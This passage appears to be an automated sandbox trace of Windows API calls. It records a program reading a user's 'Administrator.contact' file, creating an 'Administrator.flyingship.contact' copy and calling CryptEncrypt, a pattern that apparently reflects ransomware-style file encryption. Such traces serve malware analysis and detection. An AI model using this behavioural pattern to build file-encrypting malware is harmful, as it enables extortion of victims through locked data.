0x76e240 [0074.785] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e090 [0074.785] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e060 [0074.785] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b5d0 [0074.785] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df68 | out: hHeap=0x650000) returned 1 [0074.785] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e078 [0074.785] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0a8 [0074.785] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e0f0 [0074.785] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e0d8 [0074.785] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0c0 [0074.785] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e108 [0074.785] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e180 [0074.785] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e120 [0074.785] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e138 [0074.785] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e420 [0074.785] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df68 [0074.785] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e150 [0074.785] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0074.785] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb528 [0074.785] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0074.785] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0074.785] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e90 | out: hHeap=0x650000) returned 1 [0074.785] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0074.785] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e450 [0074.786] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b780 [0074.786] PeekMessageW (in: lpMsg=0x61e3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3fc) returned 0 [0074.786] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb528 [0074.786] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb538 [0074.786] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb538 | out: hHeap=0x650000) returned 1 [0074.786] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0074.786] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b780 | out: hHeap=0x650000) returned 1 [0074.786] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e450 | out: hHeap=0x650000) returned 1 [0074.786] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0074.786] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e450 [0074.786] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0074.786] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e438 [0074.786] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0074.786] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e480 [0074.786] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0074.786] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e468 [0074.786] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0074.786] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e498 [0074.786] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0074.786] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e390 [0074.786] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0074.786] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e558 [0074.786] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0074.786] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0074.786] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb548 [0074.786] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e570 [0074.787] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0074.787] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e588 [0074.787] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb528 [0074.787] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb538 [0074.787] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5a0 [0074.787] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e588 | out: hHeap=0x650000) returned 1 [0074.787] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0074.787] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5a0 | out: hHeap=0x650000) returned 1 [0074.787] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb538 | out: hHeap=0x650000) returned 1 [0074.787] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd60 [0074.787] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb538 [0074.787] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5a0 [0074.787] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb528 [0074.787] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3e8 [0074.787] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e588 [0074.787] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5a0 | out: hHeap=0x650000) returned 1 [0074.787] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0074.787] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e588 | out: hHeap=0x650000) returned 1 [0074.787] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0074.787] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e588 [0074.787] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3e8 [0074.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0074.787] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x11) returned 0x6f9748 [0074.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x6f9748, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0074.787] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e588 | out: hHeap=0x650000) returned 1 [0074.787] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de78 [0074.788] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0074.788] GetProcAddress (hModule=0x77710000, lpProcName="CryptDestroyHash") returned 0x7771df66 [0074.788] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de78 | out: hHeap=0x650000) returned 1 [0074.788] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0074.788] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de78 [0074.788] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3e8 [0074.788] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0074.788] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de78 | out: hHeap=0x650000) returned 1 [0074.788] CryptDestroyHash (hHash=0x6b8b38) returned 1 [0074.788] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb508 [0074.788] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x6a0ec8 [0074.788] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3e8 [0074.788] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e588 [0074.788] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5a0 [0074.788] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5b8 [0074.788] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb528 [0074.788] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5b8 | out: hHeap=0x650000) returned 1 [0074.788] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0074.788] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5a0 | out: hHeap=0x650000) returned 1 [0074.788] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5a0 [0074.788] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5b8 [0074.788] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5d0 [0074.788] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb528 [0074.789] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5d0 | out: hHeap=0x650000) returned 1 [0074.789] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0074.789] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5b8 | out: hHeap=0x650000) returned 1 [0074.789] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb538 | out: hHeap=0x650000) returned 1 [0074.789] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd60 | out: hHeap=0x650000) returned 1 [0074.789] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e570 | out: hHeap=0x650000) returned 1 [0074.789] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0074.789] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e150 | out: hHeap=0x650000) returned 1 [0074.789] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e438 | out: hHeap=0x650000) returned 1 [0074.789] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e450 | out: hHeap=0x650000) returned 1 [0074.789] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e468 | out: hHeap=0x650000) returned 1 [0074.789] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0074.789] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e390 | out: hHeap=0x650000) returned 1 [0074.789] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e498 | out: hHeap=0x650000) returned 1 [0074.789] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e558 | out: hHeap=0x650000) returned 1 [0074.789] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df68 | out: hHeap=0x650000) returned 1 [0074.789] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e588 | out: hHeap=0x650000) returned 1 [0074.789] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5a0 | out: hHeap=0x650000) returned 1 [0074.789] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0074.789] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a0ec8 | out: hHeap=0x650000) returned 1 [0074.789] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb508 | out: hHeap=0x650000) returned 1 [0074.789] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e510 | out: hHeap=0x650000) returned 1 [0074.789] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.789] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb508 [0074.789] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df68 [0074.789] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e420 [0074.789] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3e8 [0074.790] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0074.790] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3b8 [0074.790] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a0ca8 [0074.790] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb378 [0074.790] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0074.790] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0074.790] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0074.790] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3b8 [0074.790] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dcc0 [0074.790] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b018 [0074.790] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0074.791] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0074.791] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.791] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61e9f8 | out: lpNewFilePointer=0x0) returned 1 [0074.791] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0074.791] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0074.792] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0074.793] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.flyingship.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.flyingship.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0074.794] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0074.794] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0074.794] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0074.794] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0074.794] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61ea48 | out: lpNewFilePointer=0x0) returned 1 [0074.795] ReadFile (in: hFile=0x140, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61ea70, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61ea70*=0x10000, lpOverlapped=0x0) returned 1 [0074.800] ReadFile (in: hFile=0x140, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61ea70, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61ea70*=0xb1e, lpOverlapped=0x0) returned 1 [0074.801] ReadFile (in: hFile=0x140, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61ea70, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61ea70*=0x0, lpOverlapped=0x0) returned 1 [0074.803] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0074.803] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0074.803] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0074.803] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0074.804] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.804] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.804] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0074.804] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0074.804] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0074.804] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0074.804] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0074.804] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0074.804] PeekMessageW (in: lpMsg=0x61dd8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61dd8c) returned 0 [0074.804] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0074.804] CryptGetKeyParam (in: hKey=0x6b8b78, dwParam=0x7, pbData=0x6bb4a8, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb4a8*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0074.805] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0074.805] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0074.805] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.805] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.805] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.805] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.805] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.805] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.805] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0074.805] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.805] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0074.805] PeekMessageW (in: lpMsg=0x61e27c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e27c) returned 0 [0074.805] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.805] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.805] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0074.805] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.805] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.805] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.806] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.806] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.806] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.806] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.806] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0074.806] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0074.806] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0074.806] CryptEncrypt (in: hKey=0x6b8b78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x10b1e, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x10b20) returned 1 [0074.807] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.807] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.807] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.807] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.807] CharLowerBuffW (in: lpsz="byte[68385]", cchLength=0xb | out: lpsz="byte[68385]") returned 0xb [0074.807] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.809] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.809] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0074.809] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0074.809] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0074.809] 